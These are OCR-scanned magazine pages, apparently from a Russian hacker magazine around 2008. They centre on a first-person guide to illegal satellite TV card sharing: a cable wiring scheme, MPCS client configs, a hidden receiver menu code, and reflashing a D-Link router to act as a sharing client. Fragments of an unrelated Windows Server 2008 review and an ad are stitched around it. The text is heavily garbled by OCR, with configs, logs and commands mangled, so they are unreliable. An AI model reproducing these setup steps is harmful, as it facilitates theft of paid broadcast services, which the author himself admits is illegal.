мой позиции (нумерация идете нуля] и жмешь «ОК». 




г ОЫТКО 

Надеюсь, я смогтебя убедить, что МиІІіБІМ это мегарулез. Мне лично 
трудно представить полноценную работу с телефоном без этой архиудоб- 
ной вещи. Если возникнут какие-то вопросы, пиши письма или оставляй 
комментарий в моем журнале сП-ЬаИ:.Цуеригпа[.сот . Помогу, чем смогу. 
Удачи, камрад! ІЗ-Л 
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ІС(Э ТѴ в любое время в любом месте! 

Все, что вы хотели бы увидеть, и деже Больше: музыке. экстрнм г чада. игры, слорт г кино, мультфильмы 

и многое другое о удобное дли еае время п лщ&ом месте, 

Подключайтесь бесплатно к ІСС} ТѴ и смотрите Интернет телевидение нового поколении! 

Серале доступен в яеремнх ІСОій н йаптЫег ІСЦ6. 




ІЕЫОСІРЕІ 



^спытник ппя 

0 ВСЕЙ СЕЛІЬИ 

Вынос кардшаринга на телевизор 



Начал я тут баловаться спутниковым 
кардшарингом. Зарегистрировался 
на шаринг сервере, настроил пла- 
гин к софту и получил добрую сотню 
каналов. Поначалу было прикольно, 
потом наскучило. И нарисовалась 
еще одна проблема — родственники. 
Вот уж кто конкретно подсел на спут- 
ник, так это мама и бабушка. Стали 
ходить вокруг моего компьютера 
и плотоядно на него поглядывать. 
Дабы оградить цифровое святилище 
от назойливых любителей телевиде- 
ния без рекламы, пришлось отвязы- 
вать зомбоящик от компьютера. 

Н СПУТНИКОВЫЙ КАРДШАРИНГ — что это? 

В «Пакере» уже была статья про шаринг, поэтому я не буду подробно все 
расписывать, а лишь напомню принцип. Суть втом, что сигнал со спутника 
поступает кодированный, а вместе с ним идет закодированный ключ для 
дешифровки. Смарткарта, вставляемая в ресивер, осуществляет декоди- 
рование ключа и декодированным ключом уже происходит расшифровка 
видеопотока. Ключ меняется каждые десять секунд, поэтому подделать 
смарткарту чертовски сложно, но можно расшарить ее через интернет или 
локальную сеть и заставить декодировать ключи с чужих потоков. Таким 
образом, одна легально купленная карта может обслуживать до сотни 
клиентов. Разумеется, это незаконно, но шаринг провайдеры неплохо 
шифруются, а со стороны поставщика спутникового телевидения воровство 
очень сложно отследить. 



0 ЗАКУПКАДЕВАЙСОВ 

Итак, что же нужно, чтобы спутник можно было смотреть на телевизоре? От- 
вет: ресивер. С одним лишь отличием — он должен поддерживать шаринг. 
Поэтому всякие магазины бытовой техники я отбросил сразу и подорвался 
в сторону радиобарахолки. Выбор тут велик: отпростеньких ОрепВох до 
легендарного Огеагп Вох, который был бы лучшим вариантом для шаринга. 
Этот могучий аппарат, построенный на процессоре Роѵѵег РС, имеет на 
борту І_іпих и может служить чем угодно, хоть спутниковым роутером, хоть 
шарингсервером. На йгеат Вох реально поднять и аппаратный шаринг 
клиент, благо в него можно воткнуть витую пару без каких-либо заморо- 
чек. Всем он хорош, кроме одного — цены. Выкладывать почти десять 
тысяч рублей за примочку ктелевизору я был морально не готов. Поэтому, 
побродив по рынку, откопал на одном из лотков ОрепВох ЗООй серии. Стоил 
он недорого, порядка трехтысяч рублей. Поначалу мне пытались впарить 
легальный ОрепВох, не имевший на заднице Н5232 разъема, но, порыскав 
еще немного, я нашел правильный аппарате СОМ-портом. Там же я купил 
две СОМ розетки и несколько метров пятижильного телефонного провода. 

г СОБИРАЕМ СИСТЕМУ 

Как собирать? Для начала нужно подключить коаксиальный кабель от 
антенны к ресиверу. Делать это нужно при отключенном напряжении, иначе 
есть риск спалить л ибо ресивер, либо приемник в антенне. 

Следующий шаг— изготовление кабеля для передачи ключей от компа к ресиве- 
ру. Паяется он по схеме нуль модема отНх вТх. Схема кабеля показана на рисунке. 
Первый вывод одного разъема я соединил с первым выводом второго разъема. 
Второй вывод соединил с третьим. Третий вывод — с вторым выводом другого 
разъема. Ну и соединил проводом контакты номер пять. В итоге, получилось: 

1-1 

2 - 3 

3 - 2 
5-5 

Плотнее уложил провод в корпус и закрутил разъем на место. Воткнул 
разъем в свободный СОМ-порт на компе, а другой конец подключил к 
разъему ресивера. Подключал все при отключенном оборудовании, так как 
при отсутствии электрической развязки между ресивером и компом при 
выдергивании провода на горячем подключении реально спалить порт на 
ресивере. На этом электрическая часть закончилась. Осталось настроить 
соответствующий софт. 

г МРС5 — ОРУЖИЕ КАРДШАРЕРА! 

Одной из самых популярных и, наверное, лучших программ для 
шаринга является МРС5. Она представляет собой консольную тулзу, 
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распространяется в исходниках и существует как под винду, так и под 
линух. Я скачал эту чумовую программу где-то на форуме, посвя- 
щенном кардшарингу, и заботливо выложил на диск (поищи там). 
Настройка заключается в элементарном добавлении нужных пара- 
метров в конфигурационные файлы. Обычно достаточно настроить 
порт и сервер. 

Так, я залез в файл трсз . сопі-. 

[дІоЬаІ] 

Шее = -1 

#ЬодРі1е = Іод 

#ЬодРі1е = /сіеѵ/ббу 

СІіепкТішеоиб = 5 
ЬодРіІе = зЪсІоиЪ 

[зегіаі] 

Беѵісе = Шпегй/беѵ/иу50?с1е1ау=1 &іітеоиі=300 

Строка <Феѵі се = ііипег@/б.еѵ/Ыу50?д.е1ау-1&і:ітеои^-300 » 
означает, что ресиверу меня сидитна портуСОМІ —ясно из параметра 
«ѢСуЗО». ДляС0М2этобудет«Геѵісе = Ѣипег@/деѵ/11у31?(3.е1ау=1 
&і:ітеоиІ=300» ит.д. Остальные параметры определяютзадержку порта 
и скорость обмена. Их я оставил по дефолту, но вообще, если что-либо не 
заработает, ими можно побаловаться. 

Следующим конфигом стал трсз . зегѵег. В нем происходит настройка на 
конкретный шарингсервер. 



[геасіег] 

ЬаЬеІ - пеѵ7саш<5 

Ргобосоі = пемсатсі 

Кеу = 0102030405060708091011121314 

Беѵісе = кагсЗзЪагіпд-зирег- зегѵег . ги, 10000 

АссоигЩ = Сепосі(іе_1одіп,ту_к001_раззѵгогсІ 

РаІІЬаск = 0 

Сгоир = 1 

КесоппесбТішеоиб =20 



В разделе І_аЬеІ просто указывается метка коннекта, можно вбить туда 
несколько шарингсерверов. 

Пункт Ргоіосоі указывает, по какому шаринг протоколу будет общение с 
сервером. Стандартом тут стал пеѵѵсатсі, но бывают и другие протоколы, на- 
пример, сатсІЗбдля сз357х-сервера.Тип протокола сообщает шаринговый 
сервер при подключении. Здесьсервер, конечноже, вымышленный. 
Параметр Кеу я оставил как есть. Стандартнотам «010203040506070809 
1011121314». 

Оеѵісе — это непосредственно сервер, к которому происходит подклю- 
чение; через запятую я вписал название сервера (можно просто его ІР) и 
номер порта. Эти данные мне сообщил шарингсервер при подписке. 
Ассоипі — ну, тут все ясно: мой логин и пароль, естественно, липовый :). 

С остальными параметрами я не развлекался. По дефолту обычно все 
работает нормально. 



□ НАСТРОЙКА РЕСИВЕРА 

Я неспроста купил ресивер ОрепВох. Это агрегате секретом! Если нажать 
на пульте по очереди кнопки «тепи» — «1» — «1» — «1» — «7», то поя- 
вится скрытое меню «Редактор ключей». В нем есть пункт«Шаринг». В раз- 
деле «Ыо . СА ЗУЗ» я выставил «0500», а в разделе «Іпсіех Ргоѵідег » 

— «02 07 10». Эти параметры мне сообщил провайдер; поумолчанию 
были выставлены такие же, но, видимо, встречаются различия. 

Выставив все значения, я запустил МРС5 и стал разглядывать логи. После 
стандартной инфы пошел лог работы: 



2008/04/06 20:06:50 1420 з 

сагсізегѵег зкагСесІ 
2008/04/06 20:06:50 1420 з 

2008/04/06 20:06:50 1420 з 

2008/04/06 20:06:50 1420 з 

2008/04/06 20:06:50 1420 з 

(рісі=1580, сІе1ау=30 зес) 
2008/04/06 20:06:50 1420 з 

зеітѵѳіг= ****** ***** 
2008/04/06 20:06:50 1420 з 

2008/04/06 20:06:50 1420 з 

(рісІ=1616, аиЪо@/сІеѵ/бі:у50 
2008/04/06 20:06:50 1600 р02 

пемсатс1525 

2008/04/06 20:08:09 1616 с01 

Ьуре геееіѵег 

2008/04/06 20:08:09 1616 с01 

127.0.0.1 дгапкесі 
2008/04/06 20:08:10 1600 р02 

саісі: 0500 

2008/04/06 20:08:17 1616 с01 

А:97РА) : боітсі (774 шз) 
2008/04/06 20:08:27 1616 сОІ 

А: 97РВ) : боигкЗ (895 шз) 
2008/04/06 20:08:37 1616 сОІ 

А: 97РА) : боипсі (936 шз) 
2008/04/06 20:08:47 1616 сОІ 

А:97РВ) : боигкЗ (828 шз) 
2008/04/06 20:08:57 1616 сОІ 

А: 97РА) : боипсі (699 шз) 



» ЗТКЕАМВОАШЭ « шр- 

пемсаггкЗ: сІізаЫесІ 
гасіедазк: сІізаЫесЗ 
Іоддег зЬагкес! (рі(3=1564) 
гезоіѵег з!:аг1:ес1 

ргоху зЬагЩесІ (ріс^ІбОО, 

аШ:і сазсасііпд: сІізаЫесІ 
зегіаі: іпі^іаіігесі 

ргоху ****** . ***** . ЮООО 

(ЗебесЬесІ с!зг9500-ех1:епсІесІ 

ріаіп (Ззг9500-с1іепк 

зегѵег ******. ***** : Ю000 

Нипег (0500&020710/5015/4 

Нипег (0500&020710/5015/4 

Ьипег (0500&020710/5015/4 

Ьипег (0500&020710/5015/4 

Ьипег (0500&020710/5015/4 



Обрати внимание на задержку до получения ключа. Если она превысит 
пять секунд, изображение может начать срываться и дергаться. Задержки 
зависят от шаринг провайдера, а точнее — от прохождения пакетов до 
его сервера. Если скорость стабильно низкая, то лучше поискать другого 
провайдера, благо их сейчас стало, как грязи. 

г ДОЛОЙ КОМПЬЮТЕР! 

Вскоре надоело и это. Не хотелось постоянно держать комп работающим 
— я часто уезжаю и предпочитаю его выключать. Задумался о способах от- 
вязки от компьютера. Пошарив по инету и специализированным форумам, 
я наткнулся на девайс под названием І_апСот Вох. Это мост, связывающий 
СОМ-порт ресивера с шарингсервером через ЕШегпеЕ Однако штука 
оказалась весьма дорогой и меня жаба задавила ее покупать (тем более, по 



ВизуВох 

Что это за зверь? Да это что-то вроде микролинуха, точнее набор ІМІХ- 
утилит командной строки, запихнутый в один файл для экономии мес- 
та. Преимущества комплекта перед обычным линухом заключаются в 
предельно малом занимаемом объеме и низких системных требова- 
ниях. Основное применение ВизуВох — встраиваемые системы и раз- 
ного рода умные устройства, например роутеры. ВизуВох — модульная 
система. В процессе компиляции можно включать или исключать ее 
компоненты, точно настраивая под нужды системы. 



Модемный прикол 

Если в ПІЛ]МК-500Т в ЬАМ-разъем воткнуть витуху, в которой есть инет, 
а на АЛЗЬ-вход забить вообще, то МРС5 также будет работать! 
Используя фичу, можно сделать шаринг клиент на любом ЬАМ-соедине- 
нии. В том же роутере можно настроить УРЫ-соединение и использо- 
вать его для подключения к провайдерам, поставляющим интернет 
через домашние локальные сети. 
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ОрепВох-ЗОО. Рабочая лошадка для спутникового шаринга 



ОгеатВох — пожалуй, самый рулезный ресивер из всех существующих 



Тайное меню ресивера ОрепВох 



- ѵ 






■■ 



I ШШш 

• щш 

ткт 



■ і “* ■*! . " : # 



- , * ■. - .Л . / ' < 



_Соединительный кабель для связи ресивера и компа 



?? рЬгеакіпд 



слухам, она может работать не везде — какие-то проблемы с ѴРЫ). Вскоре 
обнаружилось еще одно удачное решение — перешитый А05І_-модем. Во- 
обще, большинство А05І_ модемов, работающих в режиме роутера (модем 
подключается к компьютеру посредством витой пары через сетевую карту), 
представляют собой довольно мощные компьютеры под управлением 
І_іпих-подобной операционной системы. Я начал копать в эту сторону. 
Оказывается, в А05І_-роутер ОЫЫК-бООТ можно залить измененную 
прошивку, основанную на иЫпих и установить МРС5. Правда, есть одно 
маленькое «но» — у ОиЫК-бООТ изначально нетР5232. 

г ПОТРОШИМ РОУТЕР 

Пошерстив по форумам, яузнал, что перепрошивке под кардшаринг 
поддаются почти все роутеры серии ОИпк-бООТ (крометех, у которых память 
фирмы Іпіеі]. 

Вскрываю крышку, внимательно оглядываю плату роутера... Мне повез- 
ло — память Затзипд. Хотя нетпорта Р5232. Нетпорта? Ну и черте ним! 
Сейчас приделаю! Что это за торчащие штырьки возле ряда светодиодов? 
Зовутся «ЗР2». Беглое протыкание осциллографом показало, что это самый 
обычный трехвольтовый ІІАВТ, превращаемый в Н5232 посредством 
широко известной микросхемы конвертера МАХ3232. По-быстрому в 5рпп1 
І_ауоиІ развел печатную плату для конвертера. В принципе, она настолько 
простая, что ее можно сделать и навесным монтажом, припаяв детали 
друг к другу. Все, что мне потребовалось, — штекер Р5232, микросхема 
МАХ3232 да четыре конденсатора на один микрофарад. Конденсаторы 
можно припаять напрямую на ножки микросхемы, благо они маленькие, а 
Пх и Тх пропустить через входы и выходы МАХ3232, как показано на схеме, и 
припаять к штырькам. Если держать плату светодиодами вверх, разъемами 
вниз и деталями ксебе.то распиновка штырьков слева направотакая: 

1 Кх 

2 - 

3 Ѵсс 

4 СЫБ 

5 Тх 



Я же, поскольку в совершенстве владею лазерно-утюжным методом изго- 
товления печатных плат, предпочел выполнить все печатным монтажом. 
Получилось компактно и красиво. Утаивать разводку я не намерен, а посему 
она выложена на диск. Также переходник можно купить на радиобарахолке 



трсз.соп^ 

[дІоЪаІ] 

Мое = -20 
ЬодРіІе = /сіеѵ/пиіі 
Сііепетітеоие = 5 

[топіеог] 

РогС = 988 

ЫоСгурС = 192.168.0.0-192.168.255.255 
АІЛю ѵі = 120 
МопЬеѵеІ = 4 

[пемсатсі] 

Кеу = 0102030405060708091011121314 
Роге = 5000000500:020710 

[св378х] 

Роге = 50002 

[сатс135] 

Роге = 50001 

# [зегіаі] 

#Беѵісе = еипег@/с1еѵ/ееу30?с1е1ау=1&еітеоие=300 
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Распайка нуль-модемного кабеля 



Печатная плата адаптера СОМ-порта. Можно просто начер- 
тить маркером на плате и вытравить или заюзать монтажку 



> Ііпкз 

• 5а1:сос1е.ЬІ2 — тут 
находится масса инфы 
по спутниковому кард- 
ша рингу, тарелкам 
и оборудованию. А 
также родной форум 
по МРС5. 



или в радиомагазине. Зовется он «ТТІ_-Н5232 адаптер». 
Внутри — тотже самый МАХ232 только в отдельном корпусе. 
Такая штука иногда идет в комплекте с некоторыми кассовыми 
аппаратами. 

г ВПРАВЛЯЕМ РОУТЕРУ мозги 

Поскольку изначальная прошивка роутера никуда не 
годится, будем ее менять! Нам нужна прошивка от Мстсс. 

Я скачал ее с сайта ЫірУ/тстсс.Ьабги (нотебе достаточно 
просто открыть диск). 

Перешиваем роутер. Для этого я зашел в меню роутера, 
набрав в адресной строке браузера его ІР-адрес. Ввел па- 
роль администратора (по дефолту І_одіп «Абтіп», раззѵѵогсі 
«Абтіп»). Продрался через меню к странице обновле- 
ния прошивки — Тооіб -> Лрсіаіе Ѳаіеѵѵау. Указал путь к 
распакованному файлу прошивки и нажал кнопку «II рсіаіе 
баіеѵѵау». После чего перезагрузил модем, опять зашел в 
меню и в разделе «Зіаішз ІпіюгтаІіоп»убедился втом, что 
прошивка встала на место. 

Дальше потребовалось переразметить память и высвободить 
место для МРС5. Для этого я зашел в роутер черезеТеІпеІ:, 
набрав в командной строке «Іеіпеі 192.168.1.1». Роутер 
приветствовал меня и предложил залогиниться. Логинился 
я, естественно, как гооі с паролем Абтіп. Ответом мне было 
приветствие ВиззуВох: 

ВизуВох оп гоибег Іодіп: гооб 
Раззѵѵогсі: 

******************************************** 



* АБЗЬ ЬАЛ ВОЛТЕР. Б-Ьіпк Б5Ь-500Т (МсМСС) 
******************************************** 

ВизуВох ѵО . 61 .рге (2007.01.15-21:12+0000) 
Виііб-іп зііеіі (азЪ) 

Епбег 'Ъеір' бог а Іізб об Ьиііб-іп соттапсіз . 

# 



• ѵіассеззіогітее.іпію 
— еще один толковый 
форум по спутнико- 
вому телевидению и 
картам доступа к ним. 



Затем я набрал в командной строке «саб /ргос/ЫсЕд/ 
епѵ», и модем отрыгнул в консоль много всего, в том числе и 
таблицу разметки памяти: 



тбсЮ 0x90083000,0x90360000 
тбсіі 0x90010090,0x90083000 
тбсі2 0x90000000,0x90010000 
тбсіЗ 0x90360000,0x90400000 
тбсі4 0x90010000,0x903 60000 

Ввел в консоли: 



есбю "тбсі5 0х901Е0000 , 0x90200000 " > /ргос/ 
бісбд/епѵ 

есбю "тбсі4 0x90020000 , 0х901Е0000 " > /ргос/ 
бісбд/епѵ 

есію "тбсЮ 0x90097000 , 0х901Е0000 " > /ргос/ 
бісбд/епѵ 

Потом перезагрузил роутер (команда «геЬооѣ») и проверил 
(команда «саб /ргос/ЬісИд/епѵ»), произошло ли перерас- 
пределение памяти. 



• зоиЛпегп-Ьеаг.різет. 
пеі/заЛѵ/сІос — архив 
спецификаций и доку- 
ментаций потеме. 




На диске лежат МРС5 
с конфигами, прошив- 
ки для роутера, а так- 
же схемы и печатные 
платы переходника. 



трсз.шег 




трсз.зегѵег 


[ассоипб] 




[геа(іег] 


Лзег = бипег 




ЬаЬеІ = пеѵѵсатсі 


Рѵѵсі = бипег 




Ргобосоі - пеѵѵсатсі 


Сгоир = 1 




Кеу - 0102030405060708091011121314 

Беѵісе = ******* # ***** //тут нужно ввести свой 


[ассоипб] 




шаринг-сервер и порт 


Лзег = топібог 




Ассоипб = *******,***** //а тут вводится логин и 


Рѵѵсі = топібог 




пароль к шаринговому серверу . 


Сгоир - 1 




САІБ = 0500 
ІБЕЫТ = 0500 : 020710 
ЕаІІЬаск = 0 
Сгоир = 1 

ВесоппесбТітеоиб =20 
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Схема адаптера СОМ-порта 




Печатная плата адаптера СОМ-порта. Можно просто начертить маркером 
на плате и вытравить или заюзать монтажку 



Скачал себе небольшой карманный РТР-сервер ЬРТРс332 . ехе. Создал 
в корне диска «С; \»каталог«С; \ЬШ» и сложил туда все барахло, а кон- 
кретно — настроенный МРС5 и файлы РТР-сервера. В каталоге оказалось 
следующее файло: 



шрсз .шеш 
шрсз .диез з 
шрсз . ас 
шрсз . згѵісі 
шрсз . сопТ 
шрсз . зегѵег 
шрсз .изег 
пЩй5 . Раг 
РбРрс132 . ехе 

Рабочий МРС5 конфигдля заливки в роутер приведен на врезке. После 
чего я запустил іРЪрд.32 . ехе и опять полез через РеІпеР в роутер. Забил 
следующую последовательность команд: 

ей /ѵаг/Ршр 

РбРр -д -1 шРйб.Раг 192.168.1.2 
Раг -хР шРйб.Раг 
ссі тусРд 

рррр -д -1 шрсз . сопР 192 .168.1.2 
РРРр -д -1 шрсз . зегѵег 192 .168.1.2 
рррр -д -1 шрсз .изег 192.168.1.2 

ей . . 

Раг -срР т.Раг шусРд 
дзір ш. Раг 
сРдзаѵе т.Раг.дг 
геЬооР 







сР 



сД 



Небольшая переделка стандартного А05І_-роутера ОІіпкбООТ. Добавляем 
кнему СОМ-порт 



И мі СИНОПА ЛЫ*Г* 

^ ПО рт 



Это вызвало заливку конфигов МРС5 в роутер с моего компа (192.168.0.2). 
Далее я воткнул провод, соединяющий Р5232-роутер с Р5232 портом 
ресивера. В разъем І_іпе воткнул А05І_, а І_АЫ подключил к компу по его 
типовой схеме. Кактолько модем подключился к А05І_линии, включил 
телевизор и попробовал посмотреть зашифрованный канал. Работает! 

г А ЕСЛИ БЫ У МЕНЯ НЕ БЫЛО ИНЕТА? 

Выход есть! Если в дом не подведена локальная сеть или отсутствует 
возможность подключить АйЗЕ (я сам живу далеко за Уралом, пробле- 
ма инета стоит остро), то спасетбРРЗ. Расход трафика при просмотре 
спутникового телевидения просто мизерный. Суди сам, раз в десять 
секунд ресивер запрашивает через шарин г сервер очередной ключ. Сам 
ключ занимаетсчитанные байты — плюс заголовок протокола пеѵѵсатсі 
с логином и паролем. Короче, и килобайта не наберется. А для аппарат- 
ного решения проблемы можно купить специально прошитый сотовый 
телефон да найти Заѵа программку, обрабатывающую ключи. Но это не 
самый удачный метод, его можно посоветовать лишь для экстремального 
шаринга вдали от цивилизации. 

г ОТВЕТСТВЕННОСТЬ 

Спалить клиента кардшарин г сервера очень трудно, но иногда их ловят 
и сажают. Так что если юзаешь кардшаринг, то стоить задуматься о том, 
что однажды сапоги могут постучаться и в твой дом. Не исключено, что 
легальная подписка на услуги спутникового телевидения и спокойствие 
(как бонус) в итоге обойдутся дешевле? Да и неттам ничего интересного, 
на этих каналах. Фильмы проще и удобней смотреть на ОѴО, порнухи 
навалом в интернете, а всякие образовательные каналы, вроде Диска- 
вери, намертвоубиты американизированной подачей материала, рассчи- 
танной на даунов. Постоянное повторение одних итехже фактов в стиле 
телепузи ков доканает кого угодно. Однако забрасывать спутниковые тех- 
нологии я бы тоже не рекомендовал. Тема очень интересная, в ней можно 
разбираться пол жизни. Плюс непередаваемый кайф отперехвата инфы, 
не предназначенной для широкого просмотра. Я даже не вспоминаю про 
фишинг, это пошло. Куда веселей, например, перехватить техническую 
трансляцию какого- ни будь футбольного матча, которую телевизионщики 
гонят со спутника на землю по служебным каналам, □с 
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Кодовое имя 

«Ьоысноки» 



ѴѴШ00ѴѴ5 5ЕРѴЕР 2008: ОБЗОР НОВОВВЕДЕНИЙ 

Появление нового продукта от Місгозой: всегда вызывало ажиотаж. И релиз 
серверной ОС ѴѴіпсіоѵѵз Зегѵег 2008 «Ьоп§1іогп» — не исключение. Еще задол- 
го до официального выхода «длиннорога» в обзорах и пресс-релизах обеща- 
ли много свежих фич. Посмотрим, что мы получили на деле. 



ГОРЯЧИЕ новости 

Разработка новой версии серверной ОС велась несколько лет (Вега 
1 была представлена еще в 2005 году), параллельно с ѴѴіп2кЗ, ко- 
торую она и призвана заменить. Версия построена на том же ядре, 



что и ѴізЕа 5Р1, имеет схожие архитектуру и функции. Кстати, не- 
которые возможности по безопасности, управлению и админист- 
рированию, заложенные в Ѵізіа (групповые политики, управление 
учетными записями, работа с КАР), будут полностью доступны 
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Менеджер первичных задач 



только при наличии контроллера домена на новом сервере. 

По сравнению с \Ѵіп2кЗ изменений очень много. Начнем с того, что ядро 
(піозкгпі . ехе) заточено под многопроцессорные системы. Диспетчер 
памяти также претерпел усовершенствования, повысившие производи- 
тельность. Отмечается ускорение работы с файлами большого объема 
за счет того, что новая система избавилась от ограничения в 64 Кб на 
объем операций ввода-вывода, доставшегося в наследство еще от пер- 
вой ОТ. При упреждающем чтении диспетчером кэша считывается вдвое 
больший объем данных. Изменен алгоритм работы с файлом подкачки. 

В Ѵізіа и 2к8 появилась новая версия протокола ЗМВ 2.0 — теперь сим- 
волические ссылки обрабатываются правильно, а пакетная обработка 
данных позволяет передавать больший объем информации. Произведен 
полный редизайн сетевого стека. 

Утилита БСРКОМО переработана и стала на порядок проще в использо- 
вании. При установке можно выбрать контроллер домена, с которого 
будет произведена репликация, не нагружая основной контроллер. На 
порядок удобнее и понятнее выглядит процедура перевода контроллера 
в другой домен или лес. Нельзя не отметить, что на последнем этапе 
настройки появилась кнопка «ЕхрогТ 8ейіп§». Нажатие на нее позволит 
сохранить все установки в файл ответов, который можно использовать 
на других компьютерах. Плюс ко всему, теперь параметры ПСРКОМО 
можно ввести прямо в командной строке. Но это косметика. Главная 
новинка — появление контроллеров доменов только для чтения (Кеаб- 
Опіу Потаіп Сопітоііег — К.СЮС) . Этот тип ОС предназначен, в первую 
очередь, для использования в филиалах, где крайне сложно обеспечить 
физическую безопасность контроллера домена. КСЮС содержит неза- 
писываемую и доступную только для чтения копию базы данных Асгіѵе 
ОігесСогу со всеми объектами и атрибутами. 

Не менее интересно появление новой службы сетевой политики и 
доступа (Иеіллгогк Роіісу апб Ассезз Зегѵісе) , пришедшей на смену ІАЗ 
(ІШегпеі: АіпЬепгісагіоп Зегѵег) . Надо сказать, она гораздо функцио- 
нальнее, чем КАОШЗ сервер. Одним из основных компонентов является 
Защита доступа к Сети (Ией/ѵогк Ассезз РгоГесгіоп — ИАР) . Ее приме- 
нение позволяет гарантировать, что узел, подключающийся к Сети, 
удовлетворяет требованиям безопасности и установленным политикам. 
Агент ИАР, работающий на клиентском компьютере, передает маркеры 
ЗузГет НеакЬ Ѵаіібашгз (ЗНѴ), содержащие информацию о соблюдении 
установленных требований серверу сетевых политик (ОТЗ). Последний 
не входит в установку по умолчанию, поэтому его необходимо предвари- 
тельно развернуть. Требования к подключаемому компьютеру пропи- 
сываются в политиках запроса соединения (Соппесгіоп Кециезі: Роіісіез) . 
Сервер может получить один из нескольких маркеров в зависимости 
от события: работает ли антивирус и антишпионское ПО, обновлены 



ли базы, установлены ли последние заплатки, включен ли межсетевой 
экран. На основании этого компьютер получает полный или ограничен- 
ный доступ в Сеть. 

Единственный недостаток системы в том, что агента КАР для *піх и 
версий ѴѴіпбоѵѵз до ХР в природе не существует. А значит, компьютеры с 
такими операционками выйти в интернет не смогут. В сетях со смешан- 
ным составом систем использование ЫРЗ будет затруднительно, а то и 
невозможно. 

Полностью переработан ИЗ 7.0, который имеет модульную архитектуру. 
По умолчанию в его состав входит 40 модулей, которые разбиты на 8 
категорий (администратор самостоятельно включает только то, что 
действительно необходимо) . К сожалению, РТР-сервер изменения не 
затронули. 

УСТАНОВКА ѴѴШ2К8 

Как и прежде, доступно несколько редакций сервера, ориентирован- 
ных на определенное окружение или задачу. К редакциям Зіапбагб, 
ЕпИегргізе, Паіасепіег и ѴѴеЪ (для 32х и 64х битных систем) добавилась 
редакция для серверов на платформе Капішп — ѴѴіпбоѵѵз Зегѵег 2008 Іо г 
Капіит-Вазеб Зузіетз. Сообщается, что это будет последняя версия ОС, 
имеющая 32х битный вариант. Отдельно идут редакции, не включаю- 
щие средство виртуализации — гипервизор Нурег-Ѵ. Их можно узнать 
по префиксу ѵѵпЬоиі: Нурег-Ѵ, и цена на такие системы будет ниже. 
Лицензируется «длиннорог» аналогично предыдущей версии, а вирту- 
альная среда требует отдельного лицензирования. Работы по Нурег-Ѵ 
еще не закончены, пока доступна только тестовая версия. Финальную 
обещают в августе. 

Минимальными требованиями являются: процессор 1 ГГц (х86) или 1.4 
ГГц (х64), ОЗУ 512 Мб и 10 Гб свободного места на жестком диске. Как 
обычно, рекомендуемые можно смело умножать на два. 

Дистрибутив для тестирования свободно скачивается с сайта корпо- 
рации. По дефолту он будет полностью работоспособен в течение 60 
дней, но прочитав на сайте Майкрософт статью под номером 948472, 
ты узнаешь, как продлить оценочный период до 240 дней. Этого вполне 
достаточно, чтобы полностью и вполне законно изучить новинку. 
Проверить количество дней, оставшихся до окончания текущего 
60-тидневного периода, можно, введя команду «зітдг. ѵЬз -сПі». 
Разработчики крайне упростили процесс установки, удалив некоторые 
шаги и сделав его быстрым и максимально понятным. Если нет кода 
активации, мастер установки предложит автоматически активировать 

\УІПСІО\Ѵ5. 

Стоит отметить наличие удобного интерфейса, при помощи которого 
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можно подготовить жесткий диск к установке. В версии 2кЗ админист- 
ратор мог лишь выбрать и отформатировать раздел. Теперь есть возмож- 
ность разделить диск на несколько разделов, просто выбрав Кеѵѵ и введя 
требуемый размер. При нажатии РогтаГ выбранный раздел отформати- 
руется без лишних запросов о типе файловой системы. 

И еще одна новинка — администратор может выбрать два варианта 
установки (правда, не во всех редакциях) : Риіі или Соге Іпзгаііагіоп. 

Во втором случае устанавливаются лишь необходимые компоненты с 
ограниченным защищенным набором ролей, а графический интерфейс 
полностью отсутствует. Такая система априори имеет большую защи- 
щенность. Все управление будет осуществляться только при помощи 
командной строки. К сожалению, переключиться затем на стандартный 
интерфейс нельзя, сервер придется переустановить. 

Во время создания пароля администратора обрати внимание на неболь- 
шую ссылку «Сгеа & е а раззѵюгд. гезеі сіі зк». Нажатие на нее вызо- 
вет мастера, при помощи которого создается дискета (именно дискета! ) 
восстановления пароля. 

По сравнению с \Ѵіп2кЗ рабочий стол системы не изменился. Если есть 
желание, можно доустановить элементы интерфейса и сделать его иден- 
тичным Аего из ѴізГа. 

ИНСТРУМЕНТЫ АДМИНА 

Изменились и инструменты администрирования сервера. При первой 
загрузке тебя встретит «Іпіііаі СопТідигаІіоп Тазкз», чье назна- 
чение совпадает с «Управлением данным сервером» из\Ѵіп2кЗ. Послед- 
ний был малополезен, поэтому после установки удостаивался флажка 
«Не показывать эту страницу при входе в систему». Возможностей у 
«Іпіііаі Сопіідигаѣіоп Тазкз» на порядок больше, чем просто 
управление ролями и созданными серверами. С его помощью можно 
установить часовой пояс, имя компьютера, настроить сеть и ѴѴіпбочѵз 
Рігеѵѵаіі, обновить сервер, добавить роль и компоненты (РеаШгез). В 
большинстве пунктов запускается простой мастер, который за несколь- 
ко шагов поможет быстро развернуть нужную функциональность. В 
комплекте поставляется 16 ролей (задач), на которые ориентирован 
конкретный сервер (АЭ, сертификация АО, КеГѵѵогкРоІісу Зегѵег, файло- 
вый сервер и другие) . Ожидается, что вскоре для загрузки будут доступ- 
ны дополнительные роли, вроде службы потокового мультимедиа. 

Все, что не является обязательным, отнесено к компонентам. Например, 
шифрование диска ВігЬоскег, балансировка сетевой нагрузки (КеГѵѵогк 
Ьоаб Ва1апсіп§), РоѵѵегЗЬеІІ, серверы и клиенты Теіпег, ЗМТР, ЗЫМР, 
управление групповой политикой, диспетчер съемных носителей и 
др. Выбор ролей и компонентов (вместо полной установки) повышает 
стабильность и безопасность. 



В отличие от предыдущих версий ѴѴіпбоѵѵз имеющиеся мастера позволя- 
ют устанавливать и удалять сразу по нескольку ролей, служб и компо- 
нентов за один сеанс. При этом производятся проверки зависимостей, 
обеспечивающих установку всех необходимых ролей и служб ролей. 
Роли устанавливаются с рекомендованными параметрами безопасно- 
сти, которые можно изменить, запустив ЗесигіГу Сопіі^игагіоп ѴѴігагб 
(мастер настройки безопасности) . Он, кстати, заменил зесебіг. 

Чтобы подготовить сервер к одной из ролей, достаточно запустить 
мастер установки. Большинство задач состоит из нескольких элементов 
под названием Службы ролей (Коіе Зегѵісез) . Например, в роли Ыей/ѵогк 
Роіісу апб Ассезз Зегѵісе доступно 6 Коіе Зегѵісез, каждая из которых 
добавляет функциональности. Если возникнет необходимость, всегда 
можно, использовав мастер, установить или удалить Коіе Зегѵісез из 
окна Зегѵег Мапа§ег. Следует признать: теперь настройка некоторых 
сервисов потребует чтения документации. 

Взглянув на список свойств сетевого интерфейса в ИеШогк Соппесгіопз, 
